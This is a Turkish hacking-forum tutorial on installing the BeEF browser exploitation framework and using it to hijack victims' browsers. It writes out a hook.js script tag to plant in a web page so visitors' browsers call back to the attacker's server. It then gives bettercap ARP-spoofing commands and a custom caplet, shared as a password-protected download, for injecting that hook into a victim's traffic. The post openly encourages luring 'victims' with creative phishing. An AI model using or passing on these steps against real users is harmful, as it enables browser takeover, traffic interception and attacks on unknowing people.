BeEF Framework Nedir? Nasıl Kullanılır? (Browserları Sömürme Aracı)

Pytang

Anka Red Team Junior
18 Eki 2014
127
19
31e868b3fc2f852213e7d8be11d78b4d.jpg


4sx426.gif



BeEF Nedir ?


Merhaba arkadaşlar bu konuda Beef denilen bir aracı inceliyeceğiz bu araç browser exploitation framework diye geçiyor yani browserları sömürme aracı.

Hackerlar bu aracı hedef bilgisayarın tarayıcısında javascript kodu çalıştırmak için kullanıyor.

6OfL8I.gif


BeEF 3 katmandan oluşmaktadır.

1- Saldırgan veya Saldırganların kişisel bilgisayarları
2- BeEF’in kurulu olduğu server
3- Hedefler

6OfL8I.gif



BeEF Kali Linux'e Nasıl Yüklenir ?


Terminali açıp bunu yazıyoruz.
Kod:
 git clone [url]https://github.com/beefproject/beef[/url]

aG6JKI.jpg


Yükleme bittikten sonra terminale ls yazıyoruz ve beef karşımıza çıktı.

cJeZWV.jpg


cd beef yazıyoruz ve beef klasörünün içerisine giriyoruz.

Bir kereliğine mahsus ./install yazıyoruz ve çıkan sorulara "y" diyip enterlıyoruz.

WNOJXr.jpg


Artık sistemi kapatım açtığımızda "cd beef" "./beef" dememiz yeterli.

wh9OB9.jpg


Buradaki hata bizden beef in içerisindeki kullanıcı adı şifremizi değişmemizi istiyor.

Bunun için terminale nano config.yaml yazıyoruz.

2HnPK5.jpg


user ve passwd değiştikten sonra "CTRL-O" "enter" "CTRL-X" yapıp basıp çıkış yapıyoruz.

Beef e giriş yapabilmek için ./beef yazdıktan sonra aşağıdaki adreslerden birine tıklayıp girebilirsiniz.

QUdYZy.jpg


6OfL8I.gif


Arkadaşlar BeEF'i temel olarak anlayabilmeniz için ben apache server üzerinden göstereceğim.

İlk olarak Linux'un içeriside bulunan Apache adında servisi kullanarak web site oluşturacağım.

Bu sadece örnek amaçlıdır siz daha yaratıcı düşünerek kurbanları oltaya takabilirsiniz.

Bunun için konsola gelip service apache2 start yazıyorum.

Daha sonra sitemin indexini düzenliyorum bunun için /var/www/index.html dizinine gidiyorum.

İndex.html i leafpad yada başka bir uygulama yardımıyla açıp içerisine <script src="http://127.0.0.1:3000/hook.js"></script> kodu yapıştırıyoruz 127.0.0.1 yerine kendi İp adresinizi yazmanız gerekiyor.

a4np3q.jpg


KFMckp.png


Kendi ipimizi öğrenmek için terminale gelip ifconfig yazıyoruz benimki 10.0.2.10 bu yüzden koda böyle yazıyorum <script src="http://10.0.2.10:3000/hook.js"></script>

8FXVIN.jpg


6OfL8I.gif


Evet artık hedefimiz oltaya geldi hedefimize uzun süre erişebilmek için kurbanın sitede durması gerekiyor. Peki biz bu durumu nasıl aşabiliriz adam sitemizden çıksa bile nasıl erişebiliriz şimdi buna gelelim.

MOFHIb.jpg


Kurbanımızın tarayıcısına bir Javascript kodu enjekte edeceğiz bu sayede sitemizden çıksa bile erişim sağlayabileceğiz.

Bunun için Kali Linux da bulunan bettercap'i kullanacağız.

İlk önce konunun aşağısında size verdiğim beefcustom.zip adlı dosyayı indirmeniz gerekiyor.

İndirdiğimiz RAR dosyanın içerisindeki beefcustom adlı dosyayı usr/share/bettercap/caplets dizinine atıyoruz

Beefcustom dosyanın içindeki beefcustom.cap adlı dosyayı leafpad yada başka bir uygulama ile açın.

iQvarZ.jpg


set arp.spoof.targets 10.0.2.4 yazan yerdeki ip yerine kurbanımızın ipsini yazıyoruz.

Sonra beefcustom.js adlı dosyayı aynı şekilde açıyoruz 10.0.2.8 yerine kendi ip adresimizi yazıyoruz kaydedip kapatıyoruz.

DRmmCN.jpg


Bettercamp çalıştırmak için terminale bettercap -iface eth0 -caplet /usr/share/bettercap/caplets/beefcustom/beefcustom.cap yazıyoruz.

rYKELx.jpg


Ever artık kurban online şimdi kurbanımızın browserında komutlarımızı deneyelim bunun için alttaki fotoğrafta görülen Commands bölümüne tıklıyoruz.

VN3sbu.jpg


Yeşil yananlar çalışır, Kırmızı olanlar düşük ihtimalle çalışır demek.


Ben Commands bölümündeki Browser bölümüne tıklıyorum, buradan Hooked Domain de Create Alert Dialog diye bir komut var bu kurbanımıza bir uyarı mesajı gönderecek deniyelim.

CJLb63.jpg


Evet uyarı mesajımız geldi.

MV8zsa.jpg


6OfL8I.gif


BEEF CUSTOM İNDİRME LİNKİ : https://www.dosyaupload.com/cgZ8

RAR PASS : pytang

VIRUS TOTAL :
https://www.virustotal.com/gui/file/aabda3a7204625e230723e544cef423f57240b2e6273c6b5ed04edb1168a8056/detection

6OfL8I.gif


Konum bu kadar arkadaşlar ilerleyen günlerde beef'in içerisindeki komutları anlatan bir konu açacağım o konuyu okuyarak da beef komutlarını öğrenebilirsiniz, okuduğunuz için teşekkürler.​
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.